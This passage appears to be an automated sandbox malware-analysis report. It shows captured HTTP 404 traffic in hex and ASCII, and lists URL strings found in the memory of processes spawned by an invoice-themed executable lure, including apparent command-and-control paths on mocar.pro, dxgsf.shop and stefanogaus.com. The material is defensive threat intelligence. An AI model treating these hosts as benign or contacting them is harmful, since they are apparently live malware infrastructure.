PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=wq93zh6QjYHzH9DTIIA6l77pbfuhMjdj_Wia_iHEJB0-1719989794146-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4f9f3bacf1871-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=9nefUG9JgfK8Jvaa6cx.jYVHOqwB4jkc9O3wfoY8OYQ-1719989796691-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4fa03a8a01871-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=Cw9MB1XKSws5DhwZsI061vsdZkGfcndq5IStvW62SM0-1719989799693-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4fa1538f0c431-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:50 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:56:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006424000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003A04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1327157394.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006F22000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004502000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://stefanogaus.com/0rsk/?hH=VoD
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Thesprinklesontop.com
            Source: owYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dxgsf.shop
            Source: owYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dxgsf.shop/vfca/
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/Easy_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJW
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/Ninja_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJ
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/Nutella_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2F
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/Quick_Chocolate_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4t
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/Recipe_for_Fried_Ice_Cream.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/__media__/design/underconstructionnotice.php?d=thesprinklesontop.co
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thesprinklesontop.com/__media__/js/trademark.php?d=thesprinklesontop.com&type=ns
